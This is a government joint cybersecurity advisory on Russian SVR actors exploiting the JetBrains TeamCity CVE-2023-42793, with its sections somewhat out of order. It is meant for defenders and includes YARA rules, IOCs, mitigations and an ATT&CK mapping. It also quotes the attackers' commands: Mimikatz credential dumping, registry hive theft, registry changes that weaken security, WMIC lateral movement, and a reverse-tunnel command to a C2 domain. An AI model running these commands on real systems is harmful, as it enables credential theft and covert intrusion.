$op_string_crypt = { c1 e? (1b | 18 | 10 | 13 | 19 | 10) 48 [4] 8b [2] c1 e? (05 | 08 | 10 | 0d | 07) 09 ?? 48 }
// 48 05 20 00 00 00 add rax, 20h ; ' '
// 48 89 C1 mov rcx, rax
// 48 8D 15 0A A6 0D 00 lea rdx, unk_14011E546
// 41 B8 30 00 00 00 mov r8d, 30h ; '0'
// E8 69 B5 FE FF call sub_14002F4B0
// 48 8B 44 24 30 mov rax, [rsp+88h+var_58]
// 48 05 40 00 00 00 add rax, 40h ; '@'
// 48 89 C1 mov rcx, rax
// 48 8D 15 1B A6 0D 00 lea rdx, unk_14011E577
// 41 B8 70 01 00 00 mov r8d, 170h
// E8 49 B5 FE FF call sub_14002F4B0
// 48 8B 44 24 30 mov rax, [rsp+88h+var_58]
// 48 05 60 00 00 00 add rax, 60h ; '`'
// 48 89 C1 mov rcx, rax
// 48 8D 15 6C A7 0D 00 lea rdx, unk_14011E6E8
// 41 B8 2F 00 00 00 mov r8d, 2Fh ; '/'
// E8 29 B5 FE FF call sub_14002F4B0
// 48 8B 44 24 30 mov rax, [rsp+88h+var_58]
// 48 05 80 00 00 00 add rax, 80h
// 48 89 C1 mov rcx, rax
// 48 8D 15 7C A7 0D 00 lea rdx, unk_14011E718
// 41 B8 2F 00 00 00 mov r8d, 2Fh ; '/'
// E8 09 B5 FE FF call sub_14002F4B0
// 48 8B 44 24 30 mov rax, [rsp+88h+var_58]
// 48 05 A0 00 00 00 add rax, 0A0h
$op_decrypt_config = {
48 05 20 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
48 05 40 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
48 05 60 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
48 05 80 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]
48 05 A0 00 00 00
}
condition:
all of them
}
Note: These rules are meant for threat hunting and have not been tested on a larger dataset.
MITIGATIONS
The FBI, CISA, NSA, SKW, CERT Polska, and NCSC assess the scope and indiscriminate targeting of this campaign poses a threat to public safety and recommend organizations implement the mitigations below to improve organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Apply available patches for CVE-2023-42793 issued by JetBrains TeamCity in mid-September 2023, if not already completed.
Monitor the network for evidence of encoded commands and execution of network scanning tools.
Ensure host-based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.
Require use of multi-factor authentication [CPG 1.3] for all services to the extent possible, particularly for email, virtual private networks, and accounts that access critical systems.
Organizations should adopt multi-factor authentication (MFA) as an additional layer of security for all users with access to sensitive data. Enabling MFA significantly reduces the risk of unauthorized access, even if passwords are compromised.
Keep all operating systems, software, and firmware up to date. Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization’s security baseline and incorporate into enterprise monitoring tools.
Audit log files to identify attempts to access privileged certificates and creation of fake identity providers.
Deploy software to identify suspicious behavior on systems.
Deploy endpoint protection systems with the ability to monitor for behavioral indicators of compromise.
Use available public resources to identify credential abuse with cloud environments.
Configure authentication mechanisms to confirm certain user activities on systems, including registering new devices.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see previous tables).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
REFERENCES
FBI, DHS, CISA, Joint Cyber Security Advisory, Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders
NSA, CISA, FBI, Joint Cyber Security Advisory, Russian SVR Targets U.S. and Allied Networks
CISA, Remediating Networks Affected by the Solarwinds and Active Directory/M365 Compromise
CISA, Alert (AA21-008A), Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments
CISA, Alert (AA20-352A), Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
CISA, CISA Insights, What Every Leader Needs to Know About the Ongoing APT Cyber Activity
FBI, CISA, Joint Cybersecurity Advisory, Advanced Persistent Threat Actors Targeting U.S. Think Tanks
CISA, Malicious Activity Targeting COVID-19 Research, Vaccine Development
NCSC, CSE, NSA, CISA, Advisory: APT 29 Targets COVID-19 Vaccine Development
The information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, SKW, CERT Polska, and NCSC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, NSA, SKW, CERT Polska, and NCSC.
VERSION HISTORY
December 12, 2023: Initial version.
APPENDIX A – INDICATORS OF COMPROMISE CVE-2023-42793
On a Windows system, the log file C:\TeamCity\logs\teamcity-server.log will contain a log message when an attacker modified the internal.properties file. There will also be a log message for every process created via the /app/rest/debug/processes endpoint. In addition to showing the command line used, the user ID of the user account whose authentication token was used during the attack is also shown. For example:
[2023-09-26 11:53:46,970] INFO - ntrollers.FileBrowseController - File edited: C:\ProgramData\JetBrains\TeamCity\config\internal.properties by user with id=1
[2023-09-26 11:53:46,970] INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:\ProgramData\JetBrains\TeamCity\config\internal.properties was modified by "user with id=1"
[2023-09-26 11:53:58,227] INFO - tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"
An attacker may attempt to cover their tracks by wiping this log file. It does not appear that TeamCity logs individual HTTP requests, but if TeamCity is configured to sit behind a HTTP proxy, the HTTP proxy may have suitable logs showing the following target endpoints being accessed:
/app/rest/users/id:1/tokens/RPC2 – This endpoint is required to exploit the vulnerability.
/app/rest/users – This endpoint is only required if the attacker wishes to create an arbitrary user.
/app/rest/debug/processes – This endpoint is only required if the attacker wishes to create an arbitrary process.
Note: The user ID value may be higher than 1.
APPENDIX B – IOCS
File IoCs
GraphicalProton backdoor:
01B5F7094DE0B2C6F8E28AA9A2DED678C166D615530E595621E692A9C0240732
34C8F155601A3948DDB0D60B582CFE87DE970D443CC0E05DF48B1A1AD2E42B5E
620D2BF14FE345EEF618FDD1DAC242B3A0BB65CCB75699FE00F7C671F2C1D869
773F0102720AF2957859D6930CD09693824D87DB705B3303CEF9EE794375CE13
7B666B978DBBE7C032CEF19A90993E8E4922B743EE839632BFA6D99314EA6C53
8AFB71B7CE511B0BCE642F46D6FC5DD79FAD86A58223061B684313966EFEF9C7
971F0CED6C42DD2B6E3EA3E6C54D0081CF9B06E79A38C2EDE3A2C5228C27A6DC
CB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF
CD3584D61C2724F927553770924149BB51811742A461146B15B34A26C92CAD43
EBE231C90FAD02590FC56D5840ACC63B90312B0E2FEE7DA3C7606027ED92600E
F1B40E6E5A7CBC22F7A0BD34607B13E7E3493B8AAD7431C47F1366F0256E23EB
C7B01242D2E15C3DA0F45B8ADEC4E6913E534849CDE16A2A6C480045E03FBEE4
4BF1915785D7C6E0987EB9C15857F7AC67DC365177A1707B14822131D43A6166
GraphicalProton HTTPS backdoor:
18101518EAE3EEC6EBE453DE4C4C380160774D7C3ED5C79E1813013AC1BB0B93
19F1EF66E449CF2A2B0283DBB756850CCA396114286E1485E35E6C672C9C3641
1E74CF0223D57FD846E171F4A58790280D4593DF1F23132044076560A5455FF8
219FB90D2E88A2197A9E08B0E7811E2E0BD23D59233287587CCC4642C2CF3D67
92C7693E82A90D08249EDEAFBCA6533FED81B62E9E056DEC34C24756E0A130A6
B53E27C79EED8531B1E05827ACE2362603FB9F77F53CEE2E34940D570217CBF7
C37C109171F32456BBE57B8676CC533091E387E6BA733FBAA01175C43CFB6EBD
C40A8006A7B1F10B1B42FDD8D6D0F434BE503FB3400FB948AC9AB8DDFA5B78A0
C832462C15C8041191F190F7A88D25089D57F78E97161C3003D68D0CC2C4BAA3
F6194121E1540C3553273709127DFA1DAAB96B0ACFAB6E92548BFB4059913C69
Backdoored vcperf:
D724728344FCF3812A0664A80270F7B4980B82342449A8C5A2FA510E10600443
Backdoored Zabbix installation archive:
4EE70128C70D646C5C2A9A17AD05949CB1FBF1043E9D671998812B2DCE75CF0F
Backdoored Webroot AV installation archive:
950ADBAF66AB214DE837E6F1C00921C501746616A882EA8C42F1BAD5F9B6EFF4
Modified rsockstun
CB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF
Network IoCs
Tunnel Endpoints
65.20.97[.]203
65.21.51[.]58
Exploitation Server
103.76.128[.]34
GraphicalProton HTTPS C2 URL:
hxxps://matclick[.]com/wp-query[.]php
The U.S. Federal Bureau of Investigation (FBI), U.S. Cybersecurity & Infrastructure Security Agency (CISA), U.S. National Security Agency (NSA), Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK’s National Cyber Security Centre (NCSC) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard—are exploiting CVE-2023-42793 at a large scale, targeting servers hosting JetBrains TeamCity software since September 2023.
Software developers use TeamCity software to manage and automate software compilation, building, testing, and releasing. If compromised, access to a TeamCity server would provide malicious actors with access to that software developer’s source code, signing certificates, and the ability to subvert software compilation and deployment processes—access a malicious actor could further use to conduct supply chain operations. Although the SVR used such access to compromise SolarWinds and its customers in 2020, limited number and seemingly opportunistic types of victims currently identified, indicate that the SVR has not used the access afforded by the TeamCity CVE in a similar manner. The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments.
To bring Russia’s actions to public attention, the authoring agencies are providing information on the SVR’s most recent compromise to aid organizations in conducting their own investigations and securing their networks, provide compromised entities with actionable indicators of compromise (IOCs), and empower private sector cybersecurity companies to better detect and counter the SVR’s malicious actions. The authoring agencies recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to the FBI and CISA.
Download the PDF version of this report:
AA23-347A Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally
(PDF, 774.65 KB
)
For a downloadable copy of IOCs, see:
AA23-347A STIX XML
(XML, 76.99 KB
)
AA23-347A STIX JSON
(JSON, 69.29 KB
)
THREAT OVERVIEW
SVR cyber operations pose a persistent threat to public and private organizations’ networks globally. Since 2013, cybersecurity companies and governments have reported on SVR operations targeting victim networks to steal confidential and proprietary information. A decade later, the authoring agencies can infer a long-term targeting pattern aimed at collecting, and enabling the collection of, foreign intelligence, a broad concept that for Russia encompasses information on the politics, economics, and military of foreign states; science and technology; and foreign counterintelligence. The SVR also conducts cyber operations targeting technology companies that enable future cyber operations.
A decade ago, public reports about SVR cyber activity focused largely on the SVR’s spear phishing operations, targeting government agencies, think tanks and policy analysis organizations, educational institutions, and political organizations. This category of targeting is consistent with the SVR’s responsibility to collect political intelligence, the collection of which has long been the SVR’s highest priority. For the Russian Government, political intelligence includes not only the development and execution of foreign policies, but also the development and execution of domestic policies and the political processes that drive them. In December 2016, the U.S. Government published a Joint Analysis Report titled “GRIZZLY STEPPE – Russian Malicious Cyber Activity,” which describes the SVR’s compromise of a U.S. political party leading up to a presidential election. The SVR’s use of spear phishing operations are visible today in its ongoing Diplomatic Orbiter campaign, primarily targeting diplomatic agencies. In 2023, SKW and CERT.PL published a Joint Analysis Report describing tools and techniques used by the SVR to target embassies in dozens of countries.
Less frequently, reporting on SVR cyber activity has addressed other aspects of the SVR’s foreign intelligence collection mission. In July 2020, U.S., U.K., and Canadian Governments jointly published an advisory revealing the SVR’s exploitation of CVEs to gain initial access to networks, and its deployment of custom malware known as WellMess, WellMail, and Sorefang to target organizations involved in COVID-19 vaccine development. Although not listed in the 2020 advisory did not mention it, the authoring agencies can now disclose that the SVR’s WellMess campaign also targeted energy companies. Such biomedical and energy targets are consistent with the SVR’s responsibility to support the Russian economy by pursuing two categories of foreign intelligence known as economic intelligence and science and technology.
In April 2021, the U.S. Government attributed a supply chain operation targeting the SolarWinds information technology company and its customers to the SVR. This attribution marked the discovery that the SVR had, since at least 2018, expanded the range of its cyber operations to include the widespread targeting of information technology companies. At least some of this targeting was aimed at enabling additional cyber operations. Following this attribution, the U.S. and U.K. Governments published advisories highlighting additional SVR TTPs, including its exploitation of various CVEs, the SVR’s use of “low and slow” password spraying techniques to gain initial access to some victims’ networks, exploitation of a zero-day exploit, and exploitation of Microsoft 365 cloud environments.
In this newly attributed operation targeting networks hosting TeamCity servers, the SVR demonstrably continues its practice of targeting technology companies. By choosing to exploit CVE-2023-42793, a software development program, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the threat actors to compromise the networks of dozens of software developers. JetBrains issued a patch for this CVE in mid-September 2023, limiting the SVR’s operation to the exploitation of unpatched, Internet-reachable TeamCity servers. While the authoring agencies assess the SVR has not yet used its accesses to software developers to access customer networks and is likely still in the preparatory phase of its operation, having access to these companies’ networks presents the SVR with opportunities to enable hard-to- detect command and control (C2) infrastructure.
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. While SVR followed a similar playbook in each compromise, they also adjusted to each operating environment and not all presented steps or actions below were executed on every host.
Initial Access - Exploitation
The SVR started to exploit Internet-connected JetBrains TeamCity servers [T1190] in late September 2023 using CVE-2023-42793, which enables the insecure handling of specific paths allowing for bypassing authorization, resulting in arbitrary code execution on the server. The authoring agencies' observations show that the TeamCity exploitation usually resulted in code execution [T1203] with high privileges granting the SVR an advantageous foothold in the network environment. The authoring agencies are not currently aware of any other initial access vector to JetBrains TeamCity currently being exploited by the SVR.
Host Reconnaissance
Initial observations show the SVR used the following basic, built-in commands to perform host reconnaissance [T1033],[T1059.003],[T1592.002]:
whoami /priv
whoami /all
whoami /groups
whoami /domain
nltest -dclist
nltest -dsgetdc
tasklist
netstat
wmic /node:"""" /user:"""" /password:"""" process list brief
wmic /node:"""" process list brief
wmic process get commandline -all
wmic process get commandline
wmic process where name=""GoogleCrashHandler64.exe"" get commandline,processed
powershell ([adsisearcher]"((samaccountname=))").Findall().Properties
powershell ([adsisearcher]"((samaccountname=))").Findall().Properties.memberof
powershell Get-WmiObject -Class Win32_Service -Computername
powershell Get-WindowsDriver -Online -All
File Exfiltration
Additionally, the authoring agencies have observed the SVR exfiltrating files [T1041] which may provide insight into the host system’s operating system:
C:\Windows\system32\ntoskrnl.exe to precisely identify system version, likely as a prerequisite to deploy EDRSandBlast.
SQL Server executable files - based on the review of the post exploitation actions, the SVR showed an interest in specific files of the SQL Server installed on the compromised systems:
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll,
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll,
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll,
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll
C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\secforwarder.dll
Visual Studio files – based on the review of the post exploitation actions, the SVR showed an interest in specific files of the Visual Studio:
C:\Program Files (x86)\Microsoft Visual Studio\2017\SQL\Common7\IDE\VSIXAutoUpdate.exe
Update management agent files – based on the review of the post exploitation actions, the SVR showed an interest in executables and configuration of patch management software:
C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd\bin\httpd.exe
C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd
C:\ProgramData\GFI\LanGuard 12\HttpdConfig\httpd.conf
Interest in SQL Server
Based on the review of the exploitation, the SVR also showed an interest in details of the SQL Server [T1059.001],[T1505.001]:
powershell Compress-Archive -Path "C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll" -DestinationPath C:\Windows\temp\1\sql.zip
SVR cyber actors also exfiltrated secforwarder.dll
Tactics Used to Avoid Detection
To avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” [T1068] technique to disable or outright kill endpoint detection and response (EDR) and antivirus (AV) software [T1562.001].
This was done using an open source project called “EDRSandBlast.” The authoring agencies have observed the SVR using EDRSandBlast to remove protected process light (PPL) protection, which is used for controlling and protecting running processes and protecting them from infection. The actors then inject code into AV/EDR processes for a small subset of victims [T1068]. Additionally, executables that are likely to be detected (i.e. Mimikatz) were executed in memory [T1003.001].
In several cases SVR attempted to hide their backdoors via:
Abusing a DLL hijacking vulnerability in Zabbix software by replacing a legitimate Zabbix DLL with their one containing GraphicalProton backdoor,
Backdooring an open source application developed by Microsoft named vcperf. SVR modified and copied publicly available sourcecode. After execution, backdoored vcperf dropped several DLLs to disc, one of those being a GraphicalProton backdoor,
Abusing a DLL hijacking vulnerability in Webroot antivirus software by replacing a legitimate DLL with one containing GraphicalProton backdoor.
To avoid detection by network monitoring, the SVR devised a covert C2 channel that used Microsoft OneDrive and Dropbox cloud services. To further enable obfuscation, data exchanged with malware via OneDrive and Dropbox were hidden inside randomly generated BMP files [T1564], illustrated below:
Privilege Escalation
To facilitate privilege escalation [T1098], the SVR used multiple techniques, including WinPEAS, NoLMHash registry key modification, and the Mimikatz tool.
The SVR modified the NoLMHash registry using the following reg command:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d "0" /f
The SVR used the following Mimikatz commands [T1003]:
privilege::debug
lsadump::cache
lsadump::secrets
lsadump::sam
sekurlsa::logonpasswords
Persistence
The SVR relied on scheduled tasks [T1053.005] to secure persistent execution of backdoors. Depending on the privileges the SVR had, their executables were stored in one of following directories:
C:\Windows\temp
C:\Windows\System32
C:\Windows\WinStore
The SVR made all modifications using the schtasks.exe binary. It then had multiple variants of arguments passed to schtasks.exe, which can be found in Appendix B – Indicators of Compromise.
To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs) [T1558.001].
Sensitive Data Exfiltration [T1020]
The SVR exfiltrated the following Windows Registry hives from its victims [T1003]:
HKLM\SYSTEM
HKLM\SAM
HKLM\SECURITY
In order to exfiltrate Windows Registry, the SVR saved hives into files [T1003.002], packed them, and then exfiltrated them using a backdoor capability. it used “reg save” to save SYSTEM, SAM and SECURITY registry hives, and used powershell to stage .zip archives in the C:\Windows\Temp\ directory.
reg save HKLM\SYSTEM ""C:\Windows\temp\1\sy.sa"" /y
reg save HKLM\SAM ""C:\Windows\temp\1\sam.sa"" /y
reg save HKLM\SECURITY ""C:\Windows\temp\1\se.sa"" /y
powershell Compress-Archive -Path C:\Windows\temp\1\ -DestinationPath C:\Windows\temp\s.zip -Force & del C:\Windows\temp\1 /F /Q
In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins.
SVR also used DSInternals open source tool to interact with Directory Services. DSInternals allows to obtain a sensitive Domain information.
Network Reconnaissance
After the SVR built a secure foothold and gained an awareness of a victim’s TeamCity server, it then focused on network reconnaissance [T1590.004]. The SVR performed network reconnaissance using a mix of built-in commands and additional tools, such as port scanner and PowerSploit, which it launched into memory [T1046]. The SVR executed the following PowerSploit commands:
Get-NetComputer
Get-NetGroup
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount"
Get-NetDiDomain
Get-AdUser
Get-DomainUser -UserName
Get-NetUser -PreauthNotRequire
Get-NetComputer | select samaccountname
Get-NetUser -SPN | select serviceprincipalname
Tunneling into Compromised Environments
In selected environments the SVR used an additional tool named, “rr.exe”—a modified open source reverse socks tunneler named Rsockstun—to establish a tunnel to the C2 infrastructure [T1572].
The authoring agencies are aware of the following infrastructure used in conjunction with “rr.exe”:
65.20.97[.]203:443
Poetpages[.]com:8443
The SVR executed Rsockstun either in memory or using the Windows Management Instrumentation Command Line (WMIC) [T1047] utility after dropping it to disk:
wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"
Lateral Movement
The SVR used WMIC to facilitate lateral movement [T1047],[T1210].
wmic /node:"""" /user:""" /password:"""" process call create ""rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost""
The SVR also modified DisableRestrictedAdmin key to enable remote connections [T1210].
It modified Registry using the following reg command:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d "0" /f
Adversary Toolset
In the course of the TeamCity operation, the SVR used multiple custom and open source available tools and backdoors. The following custom tools were observed in use during the operation:
GraphicalProton is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs [T1027.001] to exchange data with the SVR operator.
After execution, GraphicalProton gathers environment information such as active TCP/UDP connections [T1049], running processes [T1049], as well as user, host, and domain names [T1590]. OneDrive is used as a primary communication channel while Dropbox is treated as a backup channel [T1567]. API keys are hardcoded into the malware. When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files - with both commands and results [T1564.001]. Directory name is re-randomized each time the GraphicalProton process is started.
BMP files that were used to exchange data were generated in the following way:
Compress data using zlib,
Encrypt data using custom algorithm,
Add “***” string literal to encrypted data,
Create a random BMP with random rectangle,
And finally, encode encrypted data within lower pixel bits.
While the GraphicalProton backdoor has remained mostly unchanged over the months we have been tracking it, to avoid detection the adversary wrapped the tool in various different layers of obfuscation, encryption, encoders, and stagers. Two specific variants of GraphicalProton “packaging” are especially noteworthy – a variant that uses DLL hijacking [T1574.002] in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf [T1036], an open-source C++ build analysis tool from Microsoft.
GraphicalProton HTTPS variant – a variant of GraphicalProton backdoor recently introduced by the SVR that forgoes using cloud-based services as a C2 channel and instead relies on HTTP request.
To legitimize the C2 channel, SVR used a re-registered expired domain set up with dummy WordPress website. Execution of HTTPS variant of GraphicalProton is split into two files – stager and encrypted binary file that contains further code.
MITRE ATT&CK TACTICS AND TECHNIQUES
See below tables for all referenced threat actor tactics and techniques in this advisory. For additional mitigations, see the Mitigations section.
Table 1: SVR Cyber Actors ATT&CK Techniques for Enterprise - Reconnaissance
Technique Title
ID
Use
Gather Victim Network Information: Network Topology
T1590.004
SVR cyber actors may gather information about the victim’s network topology that can be used during targeting.
Gather Victim Host Information: Software
T1592.002
SVR cyber actors may gather information about the victim’s host networks that can be used during targeting.
Table 2: SVR Cyber Actors’ ATT&CK Techniques for Enterprise – Initial Access
Technique Title
ID
Use
Exploit Public-Facing Application
T1190
SVR cyber actors exploit internet-connected JetBrains TeamCity server using CVE-2023-42793 for initial access.
Table 3: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Execution
Technique Title
ID
Use
Command and Scripting Interpreter: PowerShell
T1059.001
SVR cyber actors used powershell commands to compress Microsoft SQL server .dll files.
Command and Scripting Interpreter: Windows Command Shell
T1059.003
SVR cyber actors execute these powershell commands to perform host reconnaissance:
powershell ([adsisearcher]"((samaccountname=))").Findall().Properties
powershell ([adsisearcher]"((samaccountname=))").Findall().Properties.memberof
powershell Get-WmiObject -Class Win32_Service -Computername
powershell Get-WindowsDriver -Online -All
Exploitation for Client Execution
T1203
SVR cyber actors leverage arbitrary code execution after exploiting CVE-2023-42793.
Hijack Execution Flow: DLL Side-Loading
T1574.002
SVR cyber actors use a variant of GraphicalProton that uses DLL hijacking in Zabbix as a means to start execution.
Table 4: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Persistence
Technique Title
ID
Use
Scheduled Task
T1053.005
SVR cyber actors may abuse Windows Task Schedule to perform task scheduling for initial or recurring execution of malicious code.
Server Software Component: SQL Stored Procedures
T1505.001
SVR cyber actors abuse SQL server stored procedures to maintain persistence.
Boot or Logon Autostart Execution
T1547
SVR cyber actors used C:\Windows\system32\ntoskrnl.exe to configure automatic system boot settings to maintain persistence.
Table 5: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Privilege Escalation
Technique Title
ID
Use
Exploitation for Privilege Escalation
T1068
SVR cyber actors exploit JetBrains TeamCity vulnerability to achieve escalated privileges.
To avoid detection, the SVR cyber actors used a “Bring Your Own Vulnerable Driver” technique to disable EDR and AV defense mechanisms.
Account Manipulation
T1098
SVR cyber actors may manipulate accounts to maintain and/or elevate access to victim systems.
Table 6: SVR Cyber Actors’ ATT&CK Techniques for Enterprise: Defense Evasion
Technique Title
ID
Use
Obfuscated Files or Information: Binary Padding
T1027.001
SVR cyber actors use BMPs to perform binary padding while exchange data is exfiltrated to an their C2 station.
Masquerading
T1036
SVR cyber actors use a variant that uses DLL hijacking in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf, an open-source C++ build analysis tool from Microsoft.
Process Injection
T1055
SVR cyber actors inject code into AV and EDR processes to evade defenses.
Disable or Modify Tools
T1562.001
SVR cyber actors may modify and/or disable tools to avoid possible detection of their malware/tools and activities.
Hide Artifacts
T1564
SVR cyber actors may attempt to hide artifacts associated with their behaviors to evade detection.
Hide Artifacts: Hidden Files and Directories
T1564.001
When communicating with cloud services, GraphicalProton generates a randomly named directory which is used to store infection-specific BMP files - with both commands and results.
Table 7: SVR Cyber actors’ ATT&CK Techniques for Enterprise: Credential Access
Technique Title
ID
Use
OS Credential Dumping: LSASS Memory
T1003.001
SVR cyber actors executed Mimikatz commands in memory to gain access to credentials stored in memory.
OS Credential Dumping: Security Account Manager
T1003.002
SVR cyber actors used:
privilege::debug
lsadump::cache
lsadump::secrets
lsadump::sam
sekurlsa::logonpasswords
Mimikatz commands to gain access to credentials.
Additionally, SVR cyber actors exfiltrated Windows registry hives to steal credentials.
HKLM\SYSTEM
HKLM\SAM
HKLM\SECURITY
Credentials from Password Stores: Credentials from Web Browsers
T1555.003
In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins.
Steal or Forge Kerberos Tickets: Golden Ticket
T1558.001
To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs).
Table 8: SVR Cyber Actors ATT&CK Techniques for Enterprise: Discovery
Technique Title
ID
Use
System Owner/User Discovery
T1033
SVR cyber actors use these built-in commands to perform host reconnaissance: whoami /priv, whoami / all, whoami / groups, whoami / domain to perform user discovery.
Network Service Discovery
T1046
SVR cyber actors performed network reconnaissance using a mix of built-in commands and additional tools, such as port scanner and PowerSploit.
Process Discovery
T1057
SVR cyber actors use GraphicalProton to gather running processes data.
Gather Victim Network Information
T1590
SVR cyber actors use GraphicalProton to gather victim network information.
Table 9: SVR Cyber Actors ATT&CK Techniques for Enterprise: Lateral Movement
Technique Title
ID
Use
Exploitation of Remote Services
T1210
SVR cyber actors may exploit remote services to gain unauthorized access to internal systems once inside a network.
Windows Management Instrumentation
T1047
SVR cyber actors executed Rsockstun either in memory or using Windows Management Instrumentation (WMI) to execute malicious commands and payloads.
wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect poetpages.com -pass M554-0sddsf2@34232fsl45t31"
Table 10: SVR Cyber Actors ATT&CK Techniques for Enterprise: Command and Control
Technique Title
ID
Use
Dynamic Resolution
T1568
SVR may dynamically establish connections to command-and-control infrastructure to evade common detections and remediations.
Protocol Tunneling
T1572
SVR cyber actors may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems.
In selected environments, the SVR used an additional tool named, “rr.exe”—a modified open source reverse socks tunneler named Rsockstunm—to establish a tunnel to the C2 infrastructure.
Table 11: SVR Cyber Actors ATT&CK Techniques for Enterprise: Exfiltration
Technique Title
ID
Use
Automated Exfiltration
T1020
SVR cyber actors may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during collection.
Exfiltration Over C2 Channel
T1041
SVR cyber actors may steal data by exfiltrating it over an existing C2 channel. Stolen data is encoded into normal communications using the same protocol as C2 communications.
Exfiltration Over Web Service
T1567
